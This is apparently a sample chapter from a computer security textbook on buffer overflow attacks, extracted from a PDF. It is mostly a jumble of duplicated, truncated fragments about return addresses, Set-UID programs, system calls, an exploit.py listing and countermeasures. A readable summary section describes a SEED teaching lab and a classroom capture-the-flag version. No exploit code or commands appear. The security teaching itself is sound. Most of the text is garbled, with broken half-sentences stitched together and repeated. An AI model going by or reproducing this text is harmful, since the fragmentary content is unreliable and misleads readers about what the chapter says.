Sam

ple return ad

specified by the neified by th

n get the victim prograthe victim p

uch as as a Set-UIDSet-UI p

us code can be executes code can be exe

hes.

number one vulnerabiber one vulne

h mistakes. Developertakes. Deve

ng the boundary or spe boundary

sures have been develhave been deve

ompilers, software devlers, software dev

some can be easily de can be eas

and the non-executabthe non-exec

ibc attack to defeat thettack to defea

xerciseiseD lab for this chapter. TD lab for this cha

e SEED website:SEED website: htte of this lab is for studf this lab is for

g what theywhat

ive

Chap

terrerereeteteptptThe first and third instfirst and third

()’s system call numbystem call nu

r is used to pass the arused to pass the ar

�) invokes the systemvokes the sys

erable program whenprogram w

exploit.pyploit.py (Listin(

though we do not usehough we do not

rogram puts data into agram puts data i

a mistake can causmistake can

when a b

Page 37: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.12. SUMMARY 99

their task is to develop a scheme to exploit the vulnerability and finally gain the root privilege.

In addition to the attacks, students will be guided to walk through several protection schemes

that have been implemented in the operating system to counter against buffer-overflow attacks.

Students need to evaluate whether the schemes work or not and explain why.

We have also developed a CTF version (Catch The Flag) for this lab, where the instructor

sets up a vulnerable server for students to attack. Students will work in teams during this CTF

competition. Unlike the lab version, the CTF version does not tell students all the information

needed for the attack, such as the buffer size and the address of the buffer; only the ranges of these

values will be provided. Students need to develop a good strategy, so they can succeed in the

shortest amount of time. This version of lab is conducted in a classroom setting, and students’

grades will depend on how fast they can succeed. During the competition, the instructor’s

computer will be projected to the screen; as soon as a team’s attack is successful, their team flag

will show up on the screen. This version of lab has not been hosted on the SEED website yet, so

instructors who are interested in this CTF lab can contact the author for detailed instructions.

� Problems and ResourcesThe homework problems, slides, and source code for this chapter can be downloaded from the

book’s website: https://www.handsonsecurity.net/.

Sam

ple

Chap

ternerability and finallyility

to walk through severk through

em to counter againsto counter aga

work or not and explaor not and e

atch The Flag) for thishe Flag) for

ack. Students will work. Students will

F version does not tellrsion does no

and the address of the bhe address of

develop a good strateelop a good

lab is conducted in a cs conducted

an succeed. During tceed. Durin

n; as soon as a team’s asoon as a team’s a

on of lab has not been hlab has not b

CTF lab can contact tlab can cont

urcesurces, and source code forand source code

ww.handsonsecurww.handsons